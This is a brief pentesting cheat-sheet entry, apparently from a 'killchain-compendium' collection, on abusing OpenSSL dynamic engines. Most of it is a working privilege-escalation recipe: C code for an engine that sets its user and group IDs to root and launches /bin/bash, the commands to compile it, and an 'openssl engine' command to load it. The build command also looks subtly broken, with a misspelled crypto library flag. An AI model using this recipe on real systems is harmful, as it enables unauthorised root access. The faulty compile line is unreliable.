killchain-compendium/Cryptography/OpenSSL Engine.md

OpenSSL Engine

• Hook external libs

• OpenSSL blog

• Most minimal example

#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
{
  return 1;
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()

• Shell as root

#include <openssl/engine.h>
#include <unistd.h>

static int bind(ENGINE *e, const char *id)
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()

• Compile

gcc -fPIC -o rootshell.o -c rootshell.c
gcc -shared -o rootshell.so -c -lcrytpo rootshell.o

• Execute via

openssl engine -t `pwd`/rootshell.so